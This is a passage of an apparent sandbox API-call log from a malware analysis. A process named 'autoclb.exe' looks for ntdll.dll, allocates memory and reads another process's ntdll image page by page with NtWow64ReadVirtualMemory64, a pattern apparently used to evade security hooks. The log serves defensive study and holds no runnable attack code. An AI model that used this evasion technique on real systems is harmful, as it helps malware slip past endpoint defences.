lpString2="NTDLL.DLL") returned -1 [0206.873] StrChrA (lpStart="autoclb.exe", wMatch=0x2e) returned=".exe" [0206.873] lstrcmpiA (lpString1="autoclb", lpString2="NTDLL.DLL") returned -1 [0206.873] lstrcmpiA (lpString1="ntdll.dll", lpString2="NTDLL.DLL") returned 0 [0206.873] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.874] VirtualAlloc (lpAddress=0x0, dwSize=0x1c2000, flAllocationType=0x3000, flProtect=0x4) returned 0x2720000 [0206.874] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f30000, Buffer=0x7ff9, BufferSize=0x2720000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.874] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f31000, Buffer=0x7ff9, BufferSize=0x2721000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.874] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f32000, Buffer=0x7ff9, BufferSize=0x2722000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.874] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f33000, Buffer=0x7ff9, BufferSize=0x2723000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.874] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f34000, Buffer=0x7ff9, BufferSize=0x2724000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.874] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f35000, Buffer=0x7ff9, BufferSize=0x2725000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.874] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f36000, Buffer=0x7ff9, BufferSize=0x2726000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.874] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f37000, Buffer=0x7ff9, BufferSize=0x2727000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.874] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f38000, Buffer=0x7ff9, BufferSize=0x2728000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.875] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f39000, Buffer=0x7ff9, BufferSize=0x2729000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.875] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f3a000, Buffer=0x7ff9, BufferSize=0x272a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.875] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f3b000, Buffer=0x7ff9, BufferSize=0x272b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.875] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f3c000, Buffer=0x7ff9, BufferSize=0x272c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.875] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f3d000, Buffer=0x7ff9, BufferSize=0x272d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.875] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f3e000, Buffer=0x7ff9, BufferSize=0x272e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.875] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f3f000, Buffer=0x7ff9, BufferSize=0x272f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.875] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f40000, Buffer=0x7ff9, BufferSize=0x2730000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.875] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f41000, Buffer=0x7ff9, BufferSize=0x2731000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.875] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f42000, Buffer=0x7ff9, BufferSize=0x2732000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.875] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f43000, Buffer=0x7ff9, BufferSize=0x2733000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.875] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f44000, Buffer=0x7ff9, BufferSize=0x2734000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.876] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f45000, Buffer=0x7ff9, BufferSize=0x2735000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.876] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f46000, Buffer=0x7ff9, BufferSize=0x2736000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.876] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f47000, Buffer=0x7ff9, BufferSize=0x2737000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.876] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f48000, Buffer=0x7ff9, BufferSize=0x2738000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.876] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f49000, Buffer=0x7ff9, BufferSize=0x2739000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.876] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f4a000, Buffer=0x7ff9, BufferSize=0x273a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.876] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f4b000, Buffer=0x7ff9, BufferSize=0x273b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.876] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f4c000, Buffer=0x7ff9, BufferSize=0x273c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.876] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f4d000, Buffer=0x7ff9, BufferSize=0x273d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.876] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f4e000, Buffer=0x7ff9, BufferSize=0x273e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.876] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f4f000, Buffer=0x7ff9, BufferSize=0x273f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.877] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f50000, Buffer=0x7ff9, BufferSize=0x2740000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.877] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f51000, Buffer=0x7ff9, BufferSize=0x2741000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.877] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f52000, Buffer=0x7ff9, BufferSize=0x2742000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.877] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f53000, Buffer=0x7ff9, BufferSize=0x2743000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.877] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f54000, Buffer=0x7ff9, BufferSize=0x2744000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.877] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f55000, Buffer=0x7ff9, BufferSize=0x2745000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.877] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f56000, Buffer=0x7ff9, BufferSize=0x2746000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.877] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f57000, Buffer=0x7ff9, BufferSize=0x2747000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.877] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f58000, Buffer=0x7ff9, BufferSize=0x2748000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.877] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f59000, Buffer=0x7ff9, BufferSize=0x2749000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.877] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f5a000, Buffer=0x7ff9, BufferSize=0x274a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.878] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f5b000, Buffer=0x7ff9, BufferSize=0x274b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.878] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f5c000, Buffer=0x7ff9, BufferSize=0x274c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.878] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f5d000, Buffer=0x7ff9, BufferSize=0x274d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.878] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f5e000, Buffer=0x7ff9, BufferSize=0x274e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.878] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f5f000, Buffer=0x7ff9, BufferSize=0x274f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.878] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f60000, Buffer=0x7ff9, BufferSize=0x2750000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.878] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f61000, Buffer=0x7ff9, BufferSize=0x2751000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.878] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f62000, Buffer=0x7ff9, BufferSize=0x2752000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.878] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f63000, Buffer=0x7ff9, BufferSize=0x2753000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.878] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f64000, Buffer=0x7ff9, BufferSize=0x2754000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.878] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f65000, Buffer=0x7ff9, BufferSize=0x2755000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.879] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f66000, Buffer=0x7ff9, BufferSize=0x2756000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.879] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f67000, Buffer=0x7ff9, BufferSize=0x2757000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.879] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f68000, Buffer=0x7ff9, BufferSize=0x2758000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.879] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f69000, Buffer=0x7ff9, BufferSize=0x2759000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.879] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f6a000, Buffer=0x7ff9, BufferSize=0x275a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.879] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f6b000, Buffer=0x7ff9, BufferSize=0x275b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.879] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f6c000, Buffer=0x7ff9, BufferSize=0x275c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.879] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f6d000, Buffer=0x7ff9, BufferSize=0x275d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.879] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f6e000, Buffer=0x7ff9, BufferSize=0x275e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.879] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f6f000, Buffer=0x7ff9, BufferSize=0x275f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.879] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f70000, Buffer=0x7ff9, BufferSize=0x2760000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.879] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f71000, Buffer=0x7ff9, BufferSize=0x2761000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.880] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f72000, Buffer=0x7ff9, BufferSize=0x2762000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.880] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f73000, Buffer=0x7ff9, BufferSize=0x2763000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.880] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f74000, Buffer=0x7ff9, BufferSize=0x2764000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.880] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f75000, Buffer=0x7ff9, BufferSize=0x2765000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.880] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f76000, Buffer=0x7ff9, BufferSize=0x2766000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.880] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f77000, Buffer=0x7ff9, BufferSize=0x2767000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.880] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f78000, Buffer=0x7ff9, BufferSize=0x2768000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.880] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f79000, Buffer=0x7ff9, BufferSize=0x2769000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.880] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f7a000, Buffer=0x7ff9, BufferSize=0x276a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.880] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f7b000, Buffer=0x7ff9, BufferSize=0x276b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.881] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f7c000, Buffer=0x7ff9, BufferSize=0x276c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.881] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f7d000, Buffer=0x7ff9, BufferSize=0x276d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.881] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f7e000, Buffer=0x7ff9, BufferSize=0x276e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.881] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f7f000, Buffer=0x7ff9, BufferSize=0x276f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.881] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f80000, Buffer=0x7ff9, BufferSize=0x2770000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.881] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f81000, Buffer=0x7ff9, BufferSize=0x2771000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.881] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f82000, Buffer=0x7ff9, BufferSize=0x2772000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.881] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f83000, Buffer=0x7ff9, BufferSize=0x2773000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.881] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f84000, Buffer=0x7ff9, BufferSize=0x2774000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.881] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f85000, Buffer=0x7ff9, BufferSize=0x2775000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.881] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f86000, Buffer=0x7ff9, BufferSize=0x2776000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.881] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f87000, Buffer=0x7ff9, BufferSize=0x2777000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.882] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f88000, Buffer=0x7ff9, BufferSize=0x2778000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.882] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f89000, Buffer=0x7ff9, BufferSize=0x2779000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.882] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f8a000, Buffer=0x7ff9, BufferSize=0x277a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.882] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f8b000, Buffer=0x7ff9, BufferSize=0x277b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.882] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f8c000, Buffer=0x7ff9, BufferSize=0x277c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.882] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f8d000, Buffer=0x7ff9, BufferSize=0x277d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.882] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f8e000, Buffer=0x7ff9, BufferSize=0x277e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.882] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f8f000, Buffer=0x7ff9, BufferSize=0x277f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.882] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f90000, Buffer=0x7ff9, BufferSize=0x2780000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.882] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f91000, Buffer=0x7ff9, BufferSize=0x2781000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.882] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f92000, Buffer=0x7ff9, BufferSize=0x2782000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.883] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f93000, Buffer=0x7ff9, BufferSize=0x2783000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.883] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f94000, Buffer=0x7ff9, BufferSize=0x2784000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.883] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f95000, Buffer=0x7ff9, BufferSize=0x2785000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.883] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f96000, Buffer=0x7ff9, BufferSize=0x2786000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.883] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f97000, Buffer=0x7ff9, BufferSize=0x2787000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.883] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f98000, Buffer=0x7ff9, BufferSize=0x2788000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.883] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f99000, Buffer=0x7ff9, BufferSize=0x2789000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.883] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f9a000, Buffer=0x7ff9, BufferSize=0x278a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.883] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f9b000, Buffer=0x7ff9, BufferSize=0x278b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.883] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f9c000, Buffer=0x7ff9, BufferSize=0x278c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.883] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f9d000, Buffer=0x7ff9, BufferSize=0x278d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.884] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f9e000, Buffer=0x7ff9, BufferSize=0x278e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.884] NtWow64ReadVirtualMemory64 (in: 